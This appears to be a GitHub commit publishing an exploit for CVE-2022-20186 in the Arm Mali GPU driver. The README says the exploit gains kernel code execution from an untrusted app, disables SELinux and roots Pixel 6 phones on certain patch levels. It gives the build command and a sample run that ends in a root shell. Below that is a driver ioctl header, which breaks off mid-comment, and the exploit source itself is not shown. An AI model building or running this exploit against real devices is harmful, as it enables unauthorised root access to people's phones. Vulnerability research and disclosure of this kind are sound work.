STRLCPY/CVE_2022_20186

Initial commit
Charlie Root committed 1 year ago

435a1b18

■ ■ ■ ■ ■ ■

README.md

1	+	## Exploit for CVE-2022-20186
2	+
3	+	The write up can be found [here](https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/). This is a bug in the Arm Mali kernel driver that I reported in January 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
4	+
5	+	The exploit is tested on the Google Pixel 6 and supports patch levels from Novmember 2021 to Feburary 2022. It is easy to add support for other firmware by changing a few image offsets. For reference, I used the following command to compile with clang in ndk-21:
6	+
7	+	```
8	+	android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang mali_alias.c -o mali_alias
9	+	```
10	+
11	+	The exploit rarely fails and can be retried without crashing the device. If successful, it should disable SELinux and gain root.
12	+
13	+	```
14	+	oriole:/ $ /data/local/tmp/mali_alias
15	+	fingerprint: google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys
16	+	tracking page 0x6ff794e000
17	+	drain 0x6d5b200000
18	+	gpu_va[0] 6ff6698000
19	+	gpu_va[1] 6ff6695000
20	+	alias 0x6ff6693000
21	+	overwrite addr : 6ff370051c 51c
22	+	overwrite addr : 6de310051c 51c
23	+	overwrite addr : 6d5f30051c 51c
24	+	overwrite addr : 6d5f10051c 51c
25	+	overwrite addr : 6d5f30051c 51c
26	+	overwrite addr : 6d5f10051c 51c
27	+	result 50
28	+	overwrite addr : 6ff370051c 51c
29	+	overwrite addr : 6de310051c 51c
30	+	overwrite addr : 6d5f30051c 51c
31	+	overwrite addr : 6d5f10051c 51c
32	+	overwrite addr : 6d5f30051c 51c
33	+	overwrite addr : 6d5f10051c 51c
34	+	result 50
35	+	oriole:/ #
36	+	```
37	+

■ ■ ■ ■ ■ ■

mali.h

1	+	/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
2	+	/*
3	+	*
4	+	* (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
5	+	*
6	+	* This program is free software and is provided to you under the terms of the
7	+	* GNU General Public License version 2 as published by the Free Software
8	+	* Foundation, and any use by you of this program is subject to the terms
9	+	* of such GNU license.
10	+	*
11	+	* This program is distributed in the hope that it will be useful,
12	+	* but WITHOUT ANY WARRANTY; without even the implied warranty of
13	+	* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14	+	* GNU General Public License for more details.
15	+	*
16	+	* You should have received a copy of the GNU General Public License
17	+	* along with this program; if not, you can access it online at
18	+	* http://www.gnu.org/licenses/gpl-2.0.html.
19	+	*
20	+	*/
21	+
22	+	#ifndef _UAPI_KBASE_JM_IOCTL_H_
23	+	#define _UAPI_KBASE_JM_IOCTL_H_
24	+
25	+	#include <sys/ioctl.h>
26	+	#include <linux/types.h>
27	+
28	+	/*
29	+	* 11.1:
30	+	* - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
31	+	* 11.2:
32	+	* - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
33	+	* which some user-side clients prior to 11.2 might fault if they received
34	+	* them
35	+	* 11.3:
36	+	* - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
37	+	* KBASE_IOCTL_STICKY_RESOURCE_UNMAP
38	+	* 11.4:
39	+	* - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
40	+	* 11.5:
41	+	* - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
42	+	* 11.6:
43	+	* - Added flags field to base_jit_alloc_info structure, which can be used to
44	+	* specify pseudo chunked tiler alignment for JIT allocations.
45	+	* 11.7:
46	+	* - Removed UMP support
47	+	* 11.8:
48	+	* - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
49	+	* 11.9:
50	+	* - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
51	+	* under base_mem_alloc_flags
52	+	* 11.10:
53	+	* - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
54	+	* JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
55	+	* with one softjob.
56	+	* 11.11:
57	+	* - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
58	+	* 11.12:
59	+	* - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
60	+	* 11.13:
61	+	* - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
62	+	* 11.14:
63	+	* - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
64	+	* under base_mem_alloc_flags
65	+	* 11.15:
66	+	* - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
67	+	* - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
68	+	* passed to mmap().
69	+	* 11.16:
70	+	* - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
71	+	* - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
72	+	* dma-buf. Now, buffers are mapped on GPU when first imported, no longer
73	+	* requiring external resource or sticky resource tracking. UNLESS,
74	+	* CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
75	+	* 11.17:
76	+	* - Added BASE_JD_REQ_JOB_SLOT.
77	+	* - Reused padding field in base_jd_atom_v2 to pass job slot number.
78	+	* - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
79	+	* 11.18:
80	+	* - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
81	+	* 11.19:
82	+	* - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
83	+	* 11.20:
84	+	* - Added new phys_pages member to kbase_ioctl_mem_jit_init for
85	+	* KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
86	+	* (replacing '_OLD') and _11_5 suffixes
87	+	* - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
88	+	* base_jd_atom_v2. It must currently be initialized to zero.
89	+	* - Added heap_info_gpu_addr to base_jit_alloc_info, and
90	+	* BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
91	+	* flags member. Previous variants of this structure are kept and given _10_2
92	+	* and _11_5 suffixes.
93	+	* - The above changes are checked for safe values in usual builds
94	+	* 11.21:
95	+	* - v2.0 of mali_trace debugfs file, which now versions the file separately
96	+	* 11.22:
97	+	* - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
98	+	* KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
99	+	* 11.23:
100	+	* - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
101	+	* the physical memory backing of JIT allocations. This was not supposed
102	+	* to be a valid use case, but it was allowed by the previous implementation.
103	+	* 11.24:
104	+	* - Added a sysfs file 'serialize_jobs' inside a new sub-directory
105	+	* 'scheduling'.
106	+	* 11.25:
107	+	* - Enabled JIT pressure limit in base/kbase by default
108	+	* 11.26
109	+	* - Added kinstr_jm API
110	+	* 11.27
111	+	* - Backwards compatible extension to HWC ioctl.
112	+	* 11.28:
113	+	* - Added kernel side cache ops needed hint
114	+	* 11.29:
115	+	* - Reserve ioctl 52
116	+	* 11.30:
117	+	* - Add a new priority level BASE_JD_PRIO_REALTIME
118	+	* - Add ioctl 54: This controls the priority setting.
119	+	* 11.31:
120	+	* - Added BASE_JD_REQ_LIMITED_CORE_MASK.
121	+	* - Added ioctl 55: set_limited_core_count.
122	+	*/
123	+	#define BASE_UK_VERSION_MAJOR 11
124	+	#define BASE_UK_VERSION_MINOR 31
125	+
126	+	/**
127	+	* struct kbase_ioctl_version_check - Check version compatibility between
128	+	* kernel and userspace
129	+	*
130	+	* @major: Major version number
131	+	* @minor: Minor version number
132	+	*/
133	+	struct kbase_ioctl_version_check {
134	+	__u16 major;
135	+	__u16 minor;
136	+	};
137	+
138	+	#define KBASE_IOCTL_VERSION_CHECK \
139	+	_IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
140	+
141	+
142	+	/**
143	+	* struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
144	+	*
145	+	* @addr: Memory address of an array of struct base_jd_atom_v2 or v3
146	+	* @nr_atoms: Number of entries in the array
147	+	* @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
148	+	*/
149	+	struct kbase_ioctl_job_submit {
150	+	__u64 addr;
151	+	__u32 nr_atoms;
152	+	__u32 stride;
153	+	};
154	+
155	+	#define KBASE_IOCTL_JOB_SUBMIT \
156	+	_IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
157	+
158	+	#define KBASE_IOCTL_POST_TERM \
159	+	_IO(KBASE_IOCTL_TYPE, 4)
160	+
161	+	/**
162	+	* struct kbase_ioctl_soft_event_update - Update the status of a soft-event
163	+	* @event: GPU address of the event which has been updated
164	+	* @new_status: The new status to set
165	+	* @flags: Flags for future expansion
166	+	*/
167	+	struct kbase_ioctl_soft_event_update {
168	+	__u64 event;
169	+	__u32 new_status;
170	+	__u32 flags;
171	+	};
172	+
173	+	#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
174	+	_IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
175	+
176	+	/**
177	+	* struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
178	+	* the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
179	+	* kernel
180	+	*
181	+	* @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
182	+	* @version: Represents a breaking change in the
183	+	* `struct kbase_kinstr_jm_atom_state_change`
184	+	* @padding: Explicit padding to get the structure up to 64bits. See
185	+	* https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
186	+	*
187	+	* The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
188	+	* end of the structure that older user space might not understand. If the
189	+	* `version` is the same, the structure is still compatible with newer kernels.
190	+	* The `size` can be used to cast the opaque memory returned from the kernel.
191	+	*/
192	+	struct kbase_kinstr_jm_fd_out {
193	+	__u16 size;
194	+	__u8 version;
195	+	__u8 padding[5];
196	+	};
197	+
198	+	/**
199	+	* struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
200	+	*
201	+	* @count: Number of atom states that can be stored in the kernel circular
202	+	* buffer. Must be a power of two
203	+	* @padding: Explicit padding to get the structure up to 64bits. See
204	+	* https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
205	+	*/
206	+	struct kbase_kinstr_jm_fd_in {
207	+	__u16 count;
208	+	__u8 padding[6];
209	+	};
210	+
211	+	union kbase_kinstr_jm_fd {
212	+	struct kbase_kinstr_jm_fd_in in;
213	+	struct kbase_kinstr_jm_fd_out out;
214	+	};
215	+
216	+	#define KBASE_IOCTL_KINSTR_JM_FD \
217	+	_IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
218	+
219	+
220	+	#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
221	+	_IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
222	+
223	+	#define KBASE_IOCTL_TYPE 0x80
224	+
225	+	/**
226	+	* struct kbase_ioctl_set_flags - Set kernel context creation flags
227	+	*
228	+	* @create_flags: Flags - see base_context_create_flags
229	+	*/
230	+	struct kbase_ioctl_set_flags {
231	+	__u32 create_flags;
232	+	};
233	+
234	+	#define KBASE_IOCTL_SET_FLAGS \
235	+	_IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
236	+
237	+	/**
238	+	* struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
239	+	*
240	+	* @buffer: Pointer to the buffer to store properties into
241	+	* @size: Size of the buffer
242	+	* @flags: Flags - must be zero for now
243	+	*
244	+	* The ioctl will return the number of bytes stored into @buffer or an error
245	+	* on failure (e.g. @size is too small). If @size is specified as 0 then no
246	+	* data will be written but the return value will be the number of bytes needed
247	+	* for all the properties.
248	+	*
249	+	* @flags may be used in the future to request a different format for the
250	+	* buffer. With @flags == 0 the following format is used.
251	+	*
252	+	* The buffer will be filled with pairs of values, a __u32 key identifying the
253	+	* property followed by the value. The size of the value is identified using
254	+	* the bottom bits of the key. The value then immediately followed the key and
255	+	* is tightly packed (there is no padding). All keys and values are
256	+	* little-endian.
257	+	*
258	+	* 00 = __u8
259	+	* 01 = __u16
260	+	* 10 = __u32
261	+	* 11 = __u64
262	+	*/
263	+	struct kbase_ioctl_get_gpuprops {
264	+	__u64 buffer;
265	+	__u32 size;
266	+	__u32 flags;
267	+	};
268	+
269	+	#define KBASE_IOCTL_GET_GPUPROPS \
270	+	_IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
271	+
272	+	/**
273	+	* union kbase_ioctl_mem_alloc - Allocate memory on the GPU
274	+	* @in: Input parameters
275	+	* @in.va_pages: The number of pages of virtual address space to reserve
276	+	* @in.commit_pages: The number of physical pages to allocate
277	+	* @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
278	+	* @in.flags: Flags
279	+	* @out: Output parameters
280	+	* @out.flags: Flags
281	+	* @out.gpu_va: The GPU virtual address which is allocated
282	+	*/
283	+	union kbase_ioctl_mem_alloc {
284	+	struct {
285	+	__u64 va_pages;
286	+	__u64 commit_pages;
287	+	__u64 extension;
288	+	__u64 flags;
289	+	} in;
290	+	struct {
291	+	__u64 flags;
292	+	__u64 gpu_va;
293	+	} out;
294	+	};
295	+
296	+	#define KBASE_IOCTL_MEM_ALLOC \
297	+	_IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
298	+
299	+	/**
300	+	* struct kbase_ioctl_mem_query - Query properties of a GPU memory region
301	+	* @in: Input parameters
302	+	* @in.gpu_addr: A GPU address contained within the region
303	+	* @in.query: The type of query
304	+	* @out: Output parameters
305	+	* @out.value: The result of the query
306	+	*
307	+	* Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
308	+	*/
309	+	union kbase_ioctl_mem_query {
310	+	struct {
311	+	__u64 gpu_addr;
312	+	__u64 query;
313	+	} in;
314	+	struct {
315	+	__u64 value;
316	+	} out;
317	+	};
318	+
319	+	#define KBASE_IOCTL_MEM_QUERY \
320	+	_IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
321	+
322	+	#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
323	+	#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
324	+	#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
325	+
326	+	/**
327	+	* struct kbase_ioctl_mem_free - Free a memory region
328	+	* @gpu_addr: Handle to the region to free
329	+	*/
330	+	struct kbase_ioctl_mem_free {
331	+	__u64 gpu_addr;
332	+	};
333	+
334	+	#define KBASE_IOCTL_MEM_FREE \
335	+	_IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
336	+
337	+	/**
338	+	* struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
339	+	* @buffer_count: requested number of dumping buffers
340	+	* @fe_bm: counters selection bitmask (Front end)
341	+	* @shader_bm: counters selection bitmask (Shader)
342	+	* @tiler_bm: counters selection bitmask (Tiler)
343	+	* @mmu_l2_bm: counters selection bitmask (MMU_L2)
344	+	*
345	+	* A fd is returned from the ioctl if successful, or a negative value on error
346	+	*/
347	+	struct kbase_ioctl_hwcnt_reader_setup {
348	+	__u32 buffer_count;
349	+	__u32 fe_bm;
350	+	__u32 shader_bm;
351	+	__u32 tiler_bm;
352	+	__u32 mmu_l2_bm;
353	+	};
354	+
355	+	#define KBASE_IOCTL_HWCNT_READER_SETUP \
356	+	_IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
357	+
358	+	/**
359	+	* struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
360	+	* @dump_buffer: GPU address to write counters to
361	+	* @fe_bm: counters selection bitmask (Front end)
362	+	* @shader_bm: counters selection bitmask (Shader)
363	+	* @tiler_bm: counters selection bitmask (Tiler)
364	+	* @mmu_l2_bm: counters selection bitmask (MMU_L2)
365	+	*/
366	+	struct kbase_ioctl_hwcnt_enable {
367	+	__u64 dump_buffer;
368	+	__u32 fe_bm;
369	+	__u32 shader_bm;
370	+	__u32 tiler_bm;
371	+	__u32 mmu_l2_bm;
372	+	};
373	+
374	+	#define KBASE_IOCTL_HWCNT_ENABLE \
375	+	_IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
376	+
377	+	#define KBASE_IOCTL_HWCNT_DUMP \
378	+	_IO(KBASE_IOCTL_TYPE, 10)
379	+
380	+	#define KBASE_IOCTL_HWCNT_CLEAR \
381	+	_IO(KBASE_IOCTL_TYPE, 11)
382	+
383	+	/**
384	+	* struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to.
385	+	* @data: Counter samples for the dummy model.
386	+	* @size: Size of the counter sample data.
387	+	* @padding: Padding.
388	+	*/
389	+	struct kbase_ioctl_hwcnt_values {
390	+	__u64 data;
391	+	__u32 size;
392	+	__u32 padding;
393	+	};
394	+
395	+	#define KBASE_IOCTL_HWCNT_SET \
396	+	_IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
397	+
398	+	/**
399	+	* struct kbase_ioctl_disjoint_query - Query the disjoint counter
400	+	* @counter: A counter of disjoint events in the kernel
401	+	*/
402	+	struct kbase_ioctl_disjoint_query {
403	+	__u32 counter;
404	+	};
405	+
406	+	#define KBASE_IOCTL_DISJOINT_QUERY \
407	+	_IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
408	+
409	+	/**
410	+	* struct kbase_ioctl_get_ddk_version - Query the kernel version
411	+	* @version_buffer: Buffer to receive the kernel version string
412	+	* @size: Size of the buffer
413	+	* @padding: Padding
414	+	*
415	+	* The ioctl will return the number of bytes written into version_buffer
416	+	* (which includes a NULL byte) or a negative error code
417	+	*
418	+	* The ioctl request code has to be _IOW because the data in ioctl struct is
419	+	* being copied to the kernel, even though the kernel then writes out the
420	+	* version info to the buffer specified in the ioctl.
421	+	*/
422	+	struct kbase_ioctl_get_ddk_version {
423	+	__u64 version_buffer;
424	+	__u32 size;
425	+	__u32 padding;
426	+	};
427	+
428	+	#define KBASE_IOCTL_GET_DDK_VERSION \
429	+	_IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
430	+
431	+	/**
432	+	* struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
433	+	* allocator (between kernel driver
434	+	* version 10.2--11.4)
435	+	* @va_pages: Number of VA pages to reserve for JIT
436	+	*
437	+	* Note that depending on the VA size of the application and GPU, the value
438	+	* specified in @va_pages may be ignored.
439	+	*
440	+	* New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
441	+	* backwards compatibility.
442	+	*/
443	+	struct kbase_ioctl_mem_jit_init_10_2 {
444	+	__u64 va_pages;
445	+	};
446	+
447	+	#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
448	+	_IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
449	+
450	+	/**
451	+	* struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
452	+	* allocator (between kernel driver
453	+	* version 11.5--11.19)
454	+	* @va_pages: Number of VA pages to reserve for JIT
455	+	* @max_allocations: Maximum number of concurrent allocations
456	+	* @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
457	+	* @group_id: Group ID to be used for physical allocations
458	+	* @padding: Currently unused, must be zero
459	+	*
460	+	* Note that depending on the VA size of the application and GPU, the value
461	+	* specified in @va_pages may be ignored.
462	+	*
463	+	* New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
464	+	* backwards compatibility.
465	+	*/
466	+	struct kbase_ioctl_mem_jit_init_11_5 {
467	+	__u64 va_pages;
468	+	__u8 max_allocations;
469	+	__u8 trim_level;
470	+	__u8 group_id;
471	+	__u8 padding[5];
472	+	};
473	+
474	+	#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
475	+	_IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
476	+
477	+	/**
478	+	* struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
479	+	* allocator
480	+	* @va_pages: Number of GPU virtual address pages to reserve for just-in-time
481	+	* memory allocations
482	+	* @max_allocations: Maximum number of concurrent allocations
483	+	* @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
484	+	* @group_id: Group ID to be used for physical allocations
485	+	* @padding: Currently unused, must be zero
486	+	* @phys_pages: Maximum number of physical pages to allocate just-in-time
487	+	*
488	+	* Note that depending on the VA size of the application and GPU, the value
489	+	* specified in @va_pages may be ignored.
490	+	*/
491	+	struct kbase_ioctl_mem_jit_init {
492	+	__u64 va_pages;
493	+	__u8 max_allocations;
494	+	__u8 trim_level;
495	+	__u8 group_id;
496	+	__u8 padding[5];
497	+	__u64 phys_pages;
498	+	};
499	+
500	+	#define KBASE_IOCTL_MEM_JIT_INIT \
501	+	_IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
502	+
503	+	/**
504	+	* struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
505	+	*
506	+	* @handle: GPU memory handle (GPU VA)
507	+	* @user_addr: The address where it is mapped in user space
508	+	* @size: The number of bytes to synchronise
509	+	* @type: The direction to synchronise: 0 is sync to memory (clean),
510	+	* 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
511	+	* @padding: Padding to round up to a multiple of 8 bytes, must be zero
512	+	*/
513	+	struct kbase_ioctl_mem_sync {
514	+	__u64 handle;
515	+	__u64 user_addr;
516	+	__u64 size;
517	+	__u8 type;
518	+	__u8 padding[7];
519	+	};
520	+
521	+	#define KBASE_IOCTL_MEM_SYNC \
522	+	_IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
523	+
524	+	/**
525	+	* union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
526	+	*
527	+	* @in: Input parameters
528	+	* @in.gpu_addr: The GPU address of the memory region
529	+	* @in.cpu_addr: The CPU address to locate
530	+	* @in.size: A size in bytes to validate is contained within the region
531	+	* @out: Output parameters
532	+	* @out.offset: The offset from the start of the memory region to @cpu_addr
533	+	*/
534	+	union kbase_ioctl_mem_find_cpu_offset {
535	+	struct {
536	+	__u64 gpu_addr;
537	+	__u64 cpu_addr;
538	+	__u64 size;
539	+	} in;
540	+	struct {
541	+	__u64 offset;
542	+	} out;
543	+	};
544	+
545	+	#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
546	+	_IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
547	+
548	+	/**
549	+	* struct kbase_ioctl_get_context_id - Get the kernel context ID
550	+	*
551	+	* @id: The kernel context ID
552	+	*/
553	+	struct kbase_ioctl_get_context_id {
554	+	__u32 id;
555	+	};
556	+
557	+	#define KBASE_IOCTL_GET_CONTEXT_ID \
558	+	_IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
559	+
560	+	/**
561	+	* struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
562	+	*
563	+	* @flags: Flags
564	+	*
565	+	* The ioctl returns a file descriptor when successful
566	+	*/
567	+	struct kbase_ioctl_tlstream_acquire {
568	+	__u32 flags;
569	+	};
570	+
571	+	#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
572	+	_IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
573	+
574	+	#define KBASE_IOCTL_TLSTREAM_FLUSH \
575	+	_IO(KBASE_IOCTL_TYPE, 19)
576	+
577	+	/**
578	+	* struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
579	+	*
580	+	* @gpu_addr: The memory region to modify
581	+	* @pages: The number of physical pages that should be present
582	+	*
583	+	* The ioctl may return on the following error codes or 0 for success:
584	+	* -ENOMEM: Out of memory
585	+	* -EINVAL: Invalid arguments
586	+	*/
587	+	struct kbase_ioctl_mem_commit {
588	+	__u64 gpu_addr;
589	+	__u64 pages;
590	+	};
591	+
592	+	#define KBASE_IOCTL_MEM_COMMIT \
593	+	_IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
594	+
595	+	/**
596	+	* union kbase_ioctl_mem_alias - Create an alias of memory regions
597	+	* @in: Input parameters
598	+	* @in.flags: Flags, see BASE_MEM_xxx
599	+	* @in.stride: Bytes between start of each memory region
600	+	* @in.nents: The number of regions to pack together into the alias
601	+	* @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
602	+	* @out: Output parameters
603	+	* @out.flags: Flags, see BASE_MEM_xxx
604	+	* @out.gpu_va: Address of the new alias
605	+	* @out.va_pages: Size of the new alias
606	+	*/
607	+	union kbase_ioctl_mem_alias {
608	+	struct {
609	+	__u64 flags;
610	+	__u64 stride;
611	+	__u64 nents;
612	+	__u64 aliasing_info;
613	+	} in;
614	+	struct {
615	+	__u64 flags;
616	+	__u64 gpu_va;
617	+	__u64 va_pages;
618	+	} out;
619	+	};
620	+
621	+	#define KBASE_IOCTL_MEM_ALIAS \
622	+	_IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
623	+
624	+	/**
625	+	* union kbase_ioctl_mem_import - Import memory for use by the GPU
626	+	* @in: Input parameters
627	+	* @in.flags: Flags, see BASE_MEM_xxx
628	+	* @in.phandle: Handle to the external memory
629	+	* @in.type: Type of external memory, see base_mem_import_type
630	+	* @in.padding: Amount of extra VA pages to append to the imported buffer
631	+	* @out: Output parameters
632	+	* @out.flags: Flags, see BASE_MEM_xxx
633	+	* @out.gpu_va: Address of the new alias
634	+	* @out.va_pages: Size of the new alias
635	+	*/
636	+	union kbase_ioctl_mem_import {
637	+	struct {
638	+	__u64 flags;
639	+	__u64 phandle;
640	+	__u32 type;
641	+	__u32 padding;
642	+	} in;
643	+	struct {
644	+	__u64 flags;
645	+	__u64 gpu_va;
646	+	__u64 va_pages;
647	+	} out;
648	+	};
649	+
650	+	#define KBASE_IOCTL_MEM_IMPORT \
651	+	_IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
652	+
653	+	/**
654	+	* struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
655	+	* @gpu_va: The GPU region to modify
656	+	* @flags: The new flags to set
657	+	* @mask: Mask of the flags to modify
658	+	*/
659	+	struct kbase_ioctl_mem_flags_change {
660	+	__u64 gpu_va;
661	+	__u64 flags;
662	+	__u64 mask;
663	+	};
664	+
665	+	#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
666	+	_IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
667	+
668	+	/**
669	+	* struct kbase_ioctl_stream_create - Create a synchronisation stream
670	+	* @name: A name to identify this stream. Must be NULL-terminated.
671	+	*
672	+	* Note that this is also called a "timeline", but is named stream to avoid
673	+	* confusion with other uses of the word.
674	+	*
675	+	* Unused bytes in @name (after the first NULL byte) must be also be NULL bytes.
676	+	*
677	+	* The ioctl returns a file descriptor.
678	+	*/
679	+	struct kbase_ioctl_stream_create {
680	+	char name[32];
681	+	};
682	+
683	+	#define KBASE_IOCTL_STREAM_CREATE \
684	+	_IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
685	+
686	+	/**
687	+	* struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
688	+	* @fd: The file descriptor to validate
689	+	*/
690	+	struct kbase_ioctl_fence_validate {
691	+	int fd;
692	+	};
693	+
694	+	#define KBASE_IOCTL_FENCE_VALIDATE \
695	+	_IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
696	+
697	+	/**
698	+	* struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
699	+	* @buffer: Pointer to the information
700	+	* @len: Length
701	+	* @padding: Padding
702	+	*
703	+	* The data provided is accessible through a debugfs file
704	+	*/
705	+	struct kbase_ioctl_mem_profile_add {
706	+	__u64 buffer;
707	+	__u32 len;
708	+	__u32 padding;
709	+	};
710	+
711	+	#define KBASE_IOCTL_MEM_PROFILE_ADD \
712	+	_IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
713	+
714	+	/**
715	+	* struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
716	+	* @count: Number of resources
717	+	* @address: Array of __u64 GPU addresses of the external resources to map
718	+	*/
719	+	struct kbase_ioctl_sticky_resource_map {
720	+	__u64 count;
721	+	__u64 address;
722	+	};
723	+
724	+	#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
725	+	_IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
726	+
727	+	/**
728	+	* struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was
729	+	* previously permanently mapped
730	+	* @count: Number of resources
731	+	* @address: Array of __u64 GPU addresses of the external resources to unmap
732	+	*/
733	+	struct kbase_ioctl_sticky_resource_unmap {
734	+	__u64 count;
735	+	__u64 address;
736	+	};
737	+
738	+	#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
739	+	_IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
740	+
741	+	/**
742	+	* union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
743	+	* the GPU memory region for
744	+	* the given gpu address and
